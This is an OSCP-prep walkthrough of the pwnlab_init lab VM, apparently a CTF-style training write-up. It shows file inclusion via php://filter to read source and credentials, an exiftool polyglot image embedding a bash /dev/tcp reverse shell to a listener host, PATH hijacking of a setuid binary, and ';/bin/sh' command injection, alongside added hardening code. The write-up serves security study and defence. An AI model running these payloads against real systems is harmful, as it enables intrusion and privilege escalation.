
OSCP prep: pwnlab_init VM, detailed walkthrough


Target IP discovery

Using ARP discovery:

arp-scan -l
netdiscover -i eth0 -r 192.168.155.0/24


ICMP-based discovery:

nmap -PE -sn 192.168.155.0/24 --min-rate 1000


Using TCP SYN discovery:

nmap -PS -sn 192.168.155.0/24 --min-rate 1000

ARP is usually enough; it gives the target IP: 192.168.155.177


Port scan

nmap -sV -sT --min-rate 1000 -p1-65535 192.168.155.177


Result:

80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40574/udp   status
|   100024  1          43163/tcp   status
|   100024  1          60152/udp6  status
|_  100024  1          60690/tcp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 40
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld, ConnectWithDatabase, LongColumnFlag, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolNew, FoundRows, LongPassword, SupportsCompression, SupportsTransactions, IgnoreSigpipes, InteractiveClient, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: Zc`85B.]l&t;fo|An&n{
|_  Auth Plugin Name: mysql_native_password
43163/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:14:95:CC (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop


Getting a shell through port 80

Browsing to port 80 gives quite a bit of information:

Use this server to upload and share image files inside the intranet


The file upload looks interesting, and there is also a Login page.


A website naturally calls for a dirsearch scan.


There is a config.php, but it renders as a blank page?


Back to Login. The port scan showed a database on 3306, so SQL injection on the login form is worth a try.
No luck.
Weak passwords:
No luck either.
Back to the site, where the URL has this format:

http://192.168.155.177/?page=login


Can a PHP stream wrapper be used to read files?

page=file:///etc/passwd


No. Next, the wrapper commonly seen in CTFs:

php://filter/read=convert.base64-encode/resource=/etc/passwd


No result for /etc/passwd. After trying several resource names, these work (the page parameter appends ".php", so the names are given without the extension):

php://filter/read=convert.base64-encode/resource=config
php://filter/read=convert.base64-encode/resource=upload
php://filter/read=convert.base64-encode/resource=login
php://filter/read=convert.base64-encode/resource=index


Decoded output.
index:

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>

upload:
 

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html><?php 
if(isset($_POST['submit'])) {
  if ($_FILES['file']['error'] <= 0) {
    $filename  = $_FILES['file']['name'];
    $filetype  = $_FILES['file']['type'];
    $uploaddir = 'upload/';
    $file_ext  = strrchr($filename, '.');
    $imageinfo = getimagesize($_FILES['file']['tmp_name']);
    $whitelist = array(".jpg",".jpeg",".gif",".png");
    if (!(in_array($file_ext, $whitelist))) {
      die('Not allowed extension, please upload images only.');
    }
    if(strpos($filetype,'image') === false) {
      die('Error 001');
    }
    if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg' && $imageinfo['mime'] != 'image/png') {
      die('Error 002');
    }
    if(substr_count($filetype, '/')>1){
      die('Error 003');
    }
    $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
    if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
      echo "<img src=\"".$uploadfile."\"><br />";
    } else {
      die('Error 4');
    }
  }
}?>

login:
 

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
{
  $luser = $_POST['user'];
  $lpass = base64_encode($_POST['pass']);
  $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
  $stmt->bind_param('ss', $luser, $lpass);
  $stmt->execute();
  $stmt->store_Result();
  if ($stmt->num_rows == 1)
  {
    $_SESSION['user'] = $luser;
    header('Location: ?page=upload');
  }
  else
  {
    echo "Login failed.";
  }
}
else
{
?>
<form action="" method="POST"><label>Username: </label><input id="user" type="test" name="user"><br /><label>Password: </label><input id="pass" type="password" name="pass"><br /><input type="submit" name="submit" value="Login"></form>
<?php
}

And config.php, found by following the require() in login.php.
config:

PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8


Base64-decoding it gives:

<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>


This gives a set of credentials:

root/H4u%QJ_H99  

They are not valid for the login page, so try them against the target's MySQL service instead:

mysql --ssl=0 -h 192.168.155.177  -uroot -pH4u%QJ_H99  


Connected successfully.
Databases:

show databases;


Tables:

use Users;
show tables;


Contents:

select * from users;


Three accounts are obtained (login.php compares base64_encode() of the submitted password with the pass column, so the stored values are base64 and are shown here decoded):

kent/JWzXuBJJNy
mike/SIfdsTEn6I
kane/iSv5Ym2GRo


Logging in with one of them works. Next, look at the file upload source:


Flow: check that submit was posted --> check the upload succeeded --> extension whitelist --> MIME type check --> file header check (getimagesize)
Try a polyglot image (PHP inside the image's comment field). Generate it with exiftool:

exiftool -Comment='<?php exec("/bin/bash -c \"bash -i >& /dev/tcp/192.168.155.166/9001 0>&1\""); ?>' 1.png -o 11.png


In upload.php the storage directory is:

$uploaddir = 'upload/';


and the final file path is:

$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;


where:
basename($_FILES['file']['name']): extracts the original file name
md5(): hashes that file name
$file_ext: keeps the original extension
So the uploaded file is reachable at:

http://192.168.155.177/upload/59b2900aa03cb2182a51cdb520b535b6.png
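The upload handler above lets the image through because every check it makes (extension, Content-Type, getimagesize) is satisfied by a real PNG whose metadata happens to contain PHP. The following is an added example, not the PwnLab upload.php: it keeps the same form but ignores the client-supplied name, extension and Content-Type, derives the extension from the type getimagesize() detects, re-encodes the image through GD (which rebuilds the pixel data and drops the comment/EXIF segments carrying the payload), and stores it under a random name. It assumes the GD extension is installed and that the web server is configured not to execute PHP inside upload/ (for Apache, a php_admin_flag engine off for that directory); the UPLOAD_DIR and IMAGE_TYPES names are mine.

```php
<?php
// Added example, not the original PwnLab upload.php. Assumes ext-gd
// (imagecreatefromstring / imagepng / imagejpeg / imagegif) is available.
session_start();
if (!isset($_SESSION['user'])) { die('You must be logged in.'); }

// Uploads land here; the web server must be configured so that nothing in
// this directory is ever executed as PHP (assumed server config).
const UPLOAD_DIR = __DIR__ . '/upload/';

// Detected MIME type => [extension, GD writer]. The client's file name,
// extension and Content-Type header are never consulted.
const IMAGE_TYPES = [
    'image/png'  => ['png', 'imagepng'],
    'image/jpeg' => ['jpg', 'imagejpeg'],
    'image/gif'  => ['gif', 'imagegif'],
];

// Validate one entry of $_FILES and store a re-encoded copy under a random
// name. Returns the public path, or throws RuntimeException on rejection.
// Re-encoding through GD drops every metadata segment, so a PHP payload in
// an EXIF/COM field (as in the exiftool polyglot above) is not written out.
function store_image(array $upload): string
{
    if ($upload['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if (!is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    $info = @getimagesize($upload['tmp_name']);
    if ($info === false || !isset(IMAGE_TYPES[$info['mime']])) {
        throw new RuntimeException('Not a supported image');
    }
    [$ext, $writer] = IMAGE_TYPES[$info['mime']];

    $img = @imagecreatefromstring(file_get_contents($upload['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('Image could not be decoded');
    }

    // Unguessable name; extension comes from the detected type, not the client.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . $name;
    $ok   = $writer($img, $dest);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('Could not write image');
    }
    chmod($dest, 0644);
    return 'upload/' . $name;
}
?>
<html><body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
<?php
if (isset($_POST['submit']) && isset($_FILES['file'])) {
    try {
        $path = store_image($_FILES['file']);
        echo '<img src="' . htmlspecialchars($path, ENT_QUOTES) . '"><br />';
    } catch (RuntimeException $e) {
        // Rejections are logged server-side; the client gets no detail.
        error_log('upload.php rejected upload: ' . $e->getMessage());
        echo 'Upload rejected.';
    }
}
?>
</body></html>
```

The re-encode is what defeats the polyglot; the random name removes the ability to predict the URL from the md5() of the file name, and the no-execution rule on the directory covers whatever a future check might miss. None of this matters if another script still passes a user-controlled string to include(), which is the separate bug in index.php.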


The key question is how to trigger execution of the embedded script.
1. Extension spoofing: unfortunately the whitelist blocks this.
2. Combining it with the file inclusion (LFI) vulnerability: if another page includes uploaded files, including the polyglot image runs the code:
http://192.168.155.177/upload/59b2900aa03cb2182a51cdb520b535b6.png
3. Server parsing quirks: test for Apache/IIS parsing vulnerabilities.
Option 2 is the one to use. index.php contains the multilingual stub: when a lang cookie is present, it runs include("lang/".$_COOKIE['lang']), so the cookie value decides which file gets included.
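Both include() calls in index.php build a path from request data: ?page= feeds include($_GET['page'].".php"), which is what the php://filter reads and the upload trick rely on, and the lang cookie feeds include("lang/".$_COOKIE['lang']). The following is an added example, not the box's index.php: each request value is looked up in a fixed allowlist and only the mapped file name reaches include(), so a wrapper, a traversal sequence or a path into upload/ can never resolve to anything. The PAGES and LANGS arrays and the resolve_include() helper are mine; the 'en' => 'lang/en.lang.php' entry is assumed from the commented-out setcookie() in the original.

```php
<?php
// Added example, not the PwnLab index.php. Request values are mapped through
// allowlists; the raw ?page= and lang values are never part of a file path.

// Request value => file relative to this script
const PAGES = [
    'login'  => 'login.php',
    'upload' => 'upload.php',
];

// Language files for the (still unimplemented) multilingual feature.
// The 'en' entry is assumed from the original's commented-out setcookie().
const LANGS = [
    'en' => 'lang/en.lang.php',
];

// Returns the allowlisted file for a request value, or null. Because this is
// a plain array-key comparison, "php://filter/...", "../../etc/passwd" or
// "/upload/x.png" can never resolve to a path.
function resolve_include(array $allowlist, $value): ?string
{
    if (!is_string($value)) {          // also rejects ?page[]=x
        return null;
    }
    return $allowlist[$value] ?? null;
}

// Decide what to include before any output, so a 404 status can still be sent.
$pageValue = $_GET['page'] ?? null;
$pageFile  = resolve_include(PAGES, $pageValue);
$langFile  = resolve_include(LANGS, $_COOKIE['lang'] ?? null);

if ($pageValue !== null && $pageFile === null) {
    // A rejected value is exactly the probe a defender wants in the logs.
    error_log('index.php: rejected page=' . var_export($pageValue, true));
    http_response_code(404);
}
if (isset($_COOKIE['lang']) && $langFile === null) {
    error_log('index.php: rejected lang cookie ' . var_export($_COOKIE['lang'], true));
}

if ($langFile !== null) {
    include __DIR__ . '/' . $langFile;
}
?>
<html>
<head><title>PwnLab Intranet Image Hosting</title></head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if ($pageFile !== null) {
    include __DIR__ . '/' . $pageFile;
} elseif ($pageValue !== null) {
    echo "Page not found";
} else {
    echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
```

With the allowlist in place, ?page=php://filter/read=convert.base64-encode/resource=config and a lang cookie pointing at ../upload/... both fall into the rejected branch and are logged rather than included. Setting allow_url_include=Off in php.ini is a second layer, but it does not stop the local file and php://filter cases, which is why the allowlist is the actual fix.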


Intercept the request in Burp and set the lang cookie to the uploaded image's path.


The reverse shell connects; from here privilege escalation is needed.

Lateral movement


Earlier the MySQL version 5.5.47 was noted, which suggests CVE-2016-6664,
but the conditions for exploiting it are not present here.

uname -a

shows the kernel version:

Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux


Not much use.

cat /etc/passwd
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash

Run:

su kent 


That errors out (su wants a terminal), so spawn an interactive shell with Python first:

python -c "import pty;pty.spawn('/bin/bash')"
su kent 
ls


Nothing useful, so keep moving.
mike's password does not work, so move on to kane.

cd /home


Going through the home directories one by one, a file msgmike turns up:

file msgmike

Output:

msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped


An ELF binary. Check its permissions:

ls -l msgmike

Output:

-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike


It is setuid/setgid mike and readable, so dump its strings:

strings -a msgmike


One of them is the command it runs:
cat /home/mike/msg.txt


cat is invoked by its bare name, so the binary resolves it through PATH; that allows a PATH hijack of the command chain. Create a file named cat in the current directory:

touch cat 


Put a command that starts a shell into it:

echo "/bin/sh" >cat


Make it executable:

chmod 777 cat
ls


When a program runs an external command by bare name, the directories in PATH are searched in order, so make the current directory the only search path:

export PATH=.
export
./msgmike
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
whoami
ls
cd mike
ls
strings -a msg2root

Privilege escalation

Command concatenation: the message typed into msg2root is appended to a shell command, so a ; ends that command and starts a new one:

./msg2root
;/bin/sh
id
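msgmike and msg2root fail in the two ways any program that shells out can fail: msgmike looks cat up through PATH, and msg2root pastes the typed message into a command string that a shell then parses. As an added example (not PwnLab code; the binaries on the box are C, this shows the same two defects and their fix in the web application's own language), the block below puts a string-concatenated command next to a form that names the program by absolute path, passes the message as a separate argv entry with no shell involved (proc_open() with an array command, PHP 7.4 and later), and gives the child a fixed PATH. The helper names, the /root/messages.txt and /usr/bin/tee paths and the $logfile parameter are mine.

```php
<?php
// Added example, not PwnLab code: command concatenation vs. argv passing.

// Vulnerable: untrusted text is spliced into a command line. With the input
// ";/bin/sh" the shell sees two commands, exactly as with msg2root.
function unsafe_command_line(string $message): string
{
    return "echo " . $message . " >> /root/messages.txt";
}

// Better: quote the value so the shell treats it as a single word, and name
// the program by absolute path so PATH=. cannot substitute it.
function quoted_command_line(string $message): string
{
    return "/bin/echo " . escapeshellarg($message) . " >> /root/messages.txt";
}

// Preferred (PHP >= 7.4): no shell at all. An array command makes proc_open()
// pass each element verbatim to execve(); the program is an absolute path and
// the child receives a fixed environment, so "export PATH=." in the caller's
// environment has no effect on what runs. Returns tee's exit status.
function append_message(string $message, string $logfile): int
{
    $env  = ['PATH' => '/usr/bin:/bin'];
    $spec = [
        0 => ['pipe', 'r'],                 // message goes in via stdin
        1 => ['file', '/dev/null', 'w'],
        2 => ['pipe', 'w'],
    ];
    $proc = proc_open(['/usr/bin/tee', '-a', $logfile], $spec, $pipes, null, $env);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start tee');
    }
    fwrite($pipes[0], $message . "\n");     // ";/bin/sh" is just text here
    fclose($pipes[0]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Demonstration with the walkthrough's own injection string
$payload = ";/bin/sh";
echo unsafe_command_line($payload), "\n";   // echo ;/bin/sh >> ...  : two commands
echo quoted_command_line($payload), "\n";   // /bin/echo ';/bin/sh' >> ... : one word
```

For a setuid helper the same rules apply in C: call the program by absolute path (or execve() it with a fixed argv) instead of system("cat ..."), and reset PATH rather than inheriting the caller's. A quick audit for the msgmike pattern is to run strings on setuid binaries and look for command names without a leading slash, which is exactly how the walkthrough found it.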


Success.

Key points


1. File inclusion, reading source through PHP stream wrappers
2. Code review, file upload vulnerability
3. Lateral movement between local users
4. Command hijacking through PATH
5. Bypass through command concatenation
 

http://www.xdnf.cn/news/531037.html
